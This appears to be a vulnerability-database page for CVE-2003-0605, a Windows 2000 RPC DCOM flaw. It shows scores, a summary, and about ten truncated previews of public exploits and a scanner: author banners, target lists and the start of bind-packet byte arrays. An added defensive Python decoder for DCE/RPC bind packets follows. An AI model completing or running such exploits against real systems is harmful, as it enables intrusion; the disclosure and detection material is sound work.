CVSSv2 7.5

CVE-2003-0605

Published: 27/08/2003 Updated: 30/04/2019
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 800
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote malicious users to cause a denial of service (crash), and local malicious users to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function.

Vulnerable Products

microsoft windows 2000

Exploits

////////////////////////////////////////////////////////////////////////////////////////////// // // Windows RPC DCOM Remote Exploit with 18 Targets // by pHrail and smurfy + some offsets by teos // // Targets: // 0 Win2k Polish nosp ver 5.0.2195 // 1 Win2k Polish +sp3 ver 5 ...
/* * have you recently bought one of those expensive new windows security products * on the market? do you think you now have strong protection? * Look again: * * *rpc!exec* * by ins1der (trixterjack yahoo com) * * windows remote return into libc exploit! * * remote rpc exploit breaking non exec memory protection schemes * tested agains ...
/* Windows remote RPC DCOM exploit * Coded by oc192 * * Includes 2 universal targets, 1 for win2k, and 1 for winXP. This exploit uses * ExitThread in its shellcode to prevent the RPC service from crashing upon * successful exploitation. It also has several other options including definable * bindshell and attack ports * * Features: * ...
/* DCOM RPC Overflow Discovered by LSD - Exploit Based on Xfocus's Code Written by H D Moore <hdm [at] metasploit.com> - Usage: ./dcom <Target ID> <Target IP> - Targets: - 0 Windows 2000 SP0 (english) - 1 Windows 2000 SP1 (english) - 2 Windows 2000 SP2 (english) - ...
// This is a new unpatched vulnerability - NOT the MS03-026 #include <winsock2.h> #include <stdio.h> #include <windows.h> #include <process.h> #include <string.h> #include <winbase.h> unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0 ...
////////////////////////////////////////////////////////////////////////// // // Windows RPC DCOM Remote Exploit with 48 TARGETS (Fixed) // ////////////////////////////////////////////////////////////////////////// // // English - French - Chinese - Polish - German // Japanese - Korean - Mexican - Kenyan // // Tk ...
/* Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3) */ /* Must be used with the associated shell */ /* */ /* This exploit works against unpatched systems (MS03-039) */ /* ...
/* RPCDCOM2.c ver1.1 copy by FLASHSKY flashsky at xfocus.org 2003.9.14 */ #include <stdio.h> #include <winsock2.h> #include <windows.h> #include <process.h> #include <string.h> #include <winbase.h> unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x0 ...
#include <stdio.h> #include <winsock2.h> #include <windows.h> #include <process.h> #include <string.h> #include <winbase.h> #pragma comment(lib,"ws2_32") unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0 ...
/* dcom2_scanner.c scan for second dcom vulnerability (MS03-039) by Doke Scott, doke at udel.edu, 10 Sep 2003 based on work by: * buildtheb0x presents : dcom/rpc scanner * --------------------------------------- * by: kid and farp and on packet sniffs of MS's dcom2 scanner */ #define d_dcom_scan_timeout 5 // max seconds for individual ...
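The bindstr[] arrays at the head of several listings above are DCE/RPC bind PDUs (PTYPE 0x0B): the message a client sends on TCP 135 to open an RPC association and name the interface it wants, before any __RemoteGetClassObject or other request follows. A sensor watching TCP 135 can decode that bind to see which interface a client asks for and to reject malformed ones. The decoder below is an added example written for this page; it is not code from Vulmon or from any of the exploit authors listed. The listings stop after the first 26 bytes of the bind, so the sample PDU is constructed: it reuses those 26 bytes verbatim and appends one constructed context item asserting interface 000001A0-0000-0000-C000-000000000046 (ISystemActivator, the RPCSS activation interface) at version 0 with the NDR 2.0 transfer syntax. Treating ISystemActivator as the watched interface is an assumption for the example; an operator's watch-list is their own choice.

```python
"""Minimal DCE/RPC bind PDU decoder (added example; not from any listing above)."""
import struct
import uuid

# The first 26 bytes of bindstr[] as printed in the exploit listings above;
# the listings are cut off after this point.
PAGE_BIND_PREFIX = bytes([
    0x05, 0x00, 0x0B, 0x03, 0x10, 0x00, 0x00, 0x00,
    0x48, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x00,
    0xD0, 0x16, 0xD0, 0x16, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00,
])

PTYPE_BIND = 11            # PTYPE value of a bind PDU
DREP_LITTLE_ENDIAN = 0x10  # bit in packed_drep[0]: integer fields are little-endian
NDR_TRANSFER_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")  # NDR 2.0

# ISystemActivator (RPCSS activation interface). Assumption for this example:
# it is what the constructed sample binds to and what the operator wants flagged.
ISYSTEMACTIVATOR = uuid.UUID("000001a0-0000-0000-c000-000000000046")


def build_bind(interface, if_version, call_id):
    """Construct a bind PDU with one context item (little-endian NDR, NDR 2.0 transfer)."""
    ctx = (struct.pack("<HBB", 0, 1, 0)                     # context id, n_transfer_syn, pad
           + interface.bytes_le + struct.pack("<I", if_version)
           + NDR_TRANSFER_SYNTAX.bytes_le + struct.pack("<I", 2))
    body = (struct.pack("<HHI", 5840, 5840, 0)              # max_xmit, max_recv, assoc_group
            + struct.pack("<BBH", 1, 0, 0)                  # n_context_elem + reserved
            + ctx)
    frag_len = 16 + len(body)
    header = struct.pack("<BBBB4sHHI", 5, 0, PTYPE_BIND, 0x03,
                         bytes([DREP_LITTLE_ENDIAN, 0, 0, 0]), frag_len, 0, call_id)
    return header + body


def _syntax_id(pdu, off, end):
    """Decode a p_syntax_id_t (16-byte UUID + u32 version) in the PDU's byte order."""
    if off + 20 > len(pdu):
        raise ValueError("syntax id runs past frag_length")
    raw = pdu[off:off + 16]
    iface = uuid.UUID(bytes_le=raw) if end == "<" else uuid.UUID(bytes=raw)
    (version,) = struct.unpack(end + "I", pdu[off + 16:off + 20])
    return iface, version


def parse_bind(pdu):
    """Decode a bind PDU; raise ValueError for anything that is not a complete, sane bind."""
    if len(pdu) < 16:
        raise ValueError("short common header")
    vers, ptype, flags = pdu[0], pdu[2], pdu[3]
    if vers != 5:
        raise ValueError("not DCE/RPC connection-oriented v5")
    end = "<" if pdu[4] & DREP_LITTLE_ENDIAN else ">"   # packed_drep sets integer byte order
    frag_len, auth_len, call_id = struct.unpack(end + "HHI", pdu[8:16])
    if frag_len != len(pdu):
        raise ValueError(f"frag_length {frag_len} != buffer length {len(pdu)}")
    if ptype != PTYPE_BIND:
        raise ValueError(f"PTYPE {ptype} is not a bind")
    if len(pdu) < 28:
        raise ValueError("bind body truncated")
    max_xmit, max_recv, assoc_group = struct.unpack(end + "HHI", pdu[16:24])
    n_ctx = pdu[24]
    off = 28
    contexts = []
    for _ in range(n_ctx):
        if off + 4 > len(pdu):
            raise ValueError("context element runs past frag_length")
        ctx_id, n_ts = struct.unpack(end + "HB", pdu[off:off + 3])
        off += 4
        abstract, abstract_ver = _syntax_id(pdu, off, end)
        off += 20
        transfers = []
        for _ in range(n_ts):
            transfers.append(_syntax_id(pdu, off, end))
            off += 20
        contexts.append({"id": ctx_id, "abstract": abstract,
                         "abstract_version": abstract_ver, "transfer": transfers})
    return {"ptype": ptype, "flags": flags, "call_id": call_id, "frag_length": frag_len,
            "auth_length": auth_len, "max_xmit_frag": max_xmit, "max_recv_frag": max_recv,
            "assoc_group_id": assoc_group, "contexts": contexts}


def watched_interfaces(pdu, watch_list):
    """Return the interface UUIDs in this bind's context items that are on watch_list."""
    return [c["abstract"] for c in parse_bind(pdu)["contexts"] if c["abstract"] in watch_list]


if __name__ == "__main__":
    sample = build_bind(ISYSTEMACTIVATOR, 0, 0x7F)   # constructed sample PDU
    assert sample[:26] == PAGE_BIND_PREFIX
    print(parse_bind(sample))
    print(watched_interfaces(sample, {ISYSTEMACTIVATOR}))
```

Two details matter when this runs against real traffic rather than the constructed sample: packed_drep decides whether the integer fields and the UUID's first three fields are little- or big-endian, so the decoder must read that byte before anything else; and frag_length is compared against the bytes actually on hand, so a truncated or padded PDU, including the 26-byte prefix copied from the page, is rejected rather than half-decoded.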

Github Repositories

Useful scripts

Scripts
I will be putting fixed, modified or created scripts here that are not necessarily part of a project.
ssh-check-username.py
Original: bugfuzz.com/stuff/ssh-check-username.py
I had an issue running this script with the current Kali. The problem is with changes to paramiko. See: paramiko/paramiko#1314
The solution is to replace instances of the text '_handle